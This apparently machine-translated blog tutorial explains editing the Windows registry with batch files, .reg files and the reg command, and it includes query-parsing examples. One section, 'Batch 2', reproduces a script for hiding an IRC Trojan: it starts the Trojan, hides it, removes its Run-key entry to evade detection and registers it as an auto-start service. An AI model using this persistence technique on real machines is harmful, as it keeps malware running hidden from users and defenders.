Complete strategy of batch operation Registry (read registry / write registry, etc.)

Time:2020-3-27

1、 Batch generate. Reg file operation registry
You can easily generate. Reg files with redirection symbols in batch processing. Then execute the. Reg file with the command!
Here, it’s important to understand how. Reg files operate the registry.
First, the first line of the. Reg file must be: Windows registry editor version 5.00. Then there is the content of the operation registry.
(consistent with the file format exported from the registry)

1. Create child
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]

A subkey named “TTT” was created under HKEY “local” machine \ software \.

2. Create a project name

Copy codeThe code is as follows:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
  ”Name”=”TTT BLOG”
  ”EMail”=”[email protected]
  ”URL”=”http://www.taoyoyo.net/ttt/”
  ”Type”=dword:02

In this way, four new projects are created under [HKEY \ local \ machine \ software \ TTT]: name, email, URL and type
The type of name, email and URL is “string value”
The type of type is “DWORD value”

(attachment: Windows registry value type:
Reg? SZ string value
Reg? Binary binary
Reg DWORD value
Reg? Multi? SZ multi string value
Reg? Expand? SZ expandable string value)

3. Modify the key value
Modification is relatively simple. Just export the items you need to modify, modify them with Notepad, and then import them (regedit / s). Just like creating a new one. You can modify multiple items under the same subitem at a time.

4. Delete project name

Copy codeThe code is as follows:
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
  ”EMail”=-

Execute the script, and “email” will be deleted;

5. Delete sub item

Copy codeThe code is as follows:
  Windows Registry Editor Version 5.00
  [-HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
  [-HKEY_LOCAL_MACHINE\SOFTWARE\DDD]

By executing the script, the subitems TTT and DDD have been deleted.

6. Reg file execution method
1) directly execute reg file
2) regedit / s *. Reg (/ s do not confirm)
  3)reg import *.reg

7. In fact, we can use DLL file instead of reg file.

Batch example 1:

Copy codeThe code is as follows:
  @echo off
  echo Windows Registry Editor Version 5.00 >t1.reg
  echo.
  echo [HKEY_LOCAL_MACHINE\SOFTWARE\TTT] >>t1.reg
  echo “Name”=”TTT BLOG” >>t1.reg
  echo “EMail”=”[email protected]” >>t1.reg
  echo “URL”=”http://www.taoyoyo.net/ttt/” >>t1.reg
  echo “Type”=dword:02 >>t1.reg
  regedit /s t1.reg
  del /q t1.reg
  pause

Batch 2: (this example is someone else’s, not very understanding ~ ~)
When we use some older Trojans, we may generate a key value under [HKEY ﹣ local machine \ software \ Microsoft \ windows \ CurrentVersion \ run (RunOnce, runservices, runexec)] in the registry to realize the self startup of Trojans. However, it is easy to expose the path of Trojans, which leads to the Trojans being killed, It is relatively safe to register Trojan horse program as system service. Take the configured IRC Trojan dsnx as an example (named windrv32. Exe)

Copy codeThe code is as follows:
  @start windrv32.exe
  @attrib +h +r windrv32.exe
  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
  @echo “windsnx “=- >>patch.dll
  @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
  @regedit /s patch.dll
  @delete patch.dll
@ REM [delete dsnxde’s startup key in the registry, use sc.exe to register it as a system critical service, set its properties as hidden and read-only, and config as self startup]
It’s not safer for rem

II. Reg command operation registry

The reg command is a special registry operation tool provided by windows. It can query, add, delete, import, export and compare conveniently. For details, please refer to the help provided by the system

Reg operation [parameter list]
Operation [ QUERY | ADD | DELETE | COPY |
SAVE | LOAD | UNLOAD | RESTORE |
COMPARE | EXPORT | IMPORT ]

1. Query all subitems and values
  
D:\>reg query hklm\software\TTT

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\TTT
Name REG_SZ TTT BLOG
EMail REG_SZ [email protected]
URL REG_SZ http://www.taoyoyo.net/ttt/
Type REG_DWORD 0x2

2. Query specific items

D:\>reg query hklm\software\ttt /v url

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\ttt
url REG_SZ http://www.taoyoyo.net/ttt/

The most difficult thing here is how to get the string we want. After a long time of confusion, we finally found a way.
There is no other good way to intercept what we need with the find, for loop. (if you don’t understand the following example, please refer to another article in this blog: Dos loop bat / batch for command details II)
For example, to get the key value of URL: http://www.taoyoyo.net/ttt/, you can use the following script:

Copy codeThe code is as follows:
  @ECHO OFF
  for /f “tokens=1,2,3,4,*” %%i in (‘reg query “HKEY_LOCAL_MACHINE\software\ttt” ^| find /i “URL”‘) do SET “pURL=%%k”
The URL value of echo TTT blog is:% purl%

Save as Test.bat, and the results are as follows:

D:\>test.bat
The URL value of TTT blog is: http://www.taoyoyo.net/ttt/

No, I don’t know why the computer at home runs the “reg” command (including reg /?) on the command line. The CPU takes up 100%. Look at the task manager. The CMD takes up more than 80%. I don’t know why
There’s no problem running other commands, including regedit / S

Looked up, there is said to be the reason of the Trojan horse on the Internet, but looked up, it is not like. No files were found, and there was no problem running other commands
Don’t do it first. I have a detailed explanation of reg command on hand. I’ll sort it out later!

Because of the poison check, I used my own clear.bat to clean up the C disk, and I found a space of 1 g. there are only a few hundred trillion left What a lot of garbage in Windows ~ ~ don’t forget to clean it up often!

Two more batch files can be released to automatically monitor Outlook Express. If necessary, you can click download
1. Oemonitorcount.bat function: you can reset the number of times the OE is opened in the registry to avoid prompt compression when it is more than 100 times
2. Oemonitorsize.bat function: it can monitor the size of Outlook Express mail files (*. DBX). When it is larger than the specified size, an alarm log will be generated.

These two files can be added to the startup group and run automatically every time you start!
These two are mainly to solve some problems that often arise in the company:
1) there are often people whose mail files exceed several G;
2) sometimes, after compression according to the prompts, mail may be lost.

Just found that the downloaded file has the suffix of “HTM”. Please remove the suffix and use it again!
In addition, when downloading, please use the following links, such as the high-speed download address of qiannao Telecom and the high-speed download address of qiannao Netcom. The VIP link above is dedicated to thousand brain users~~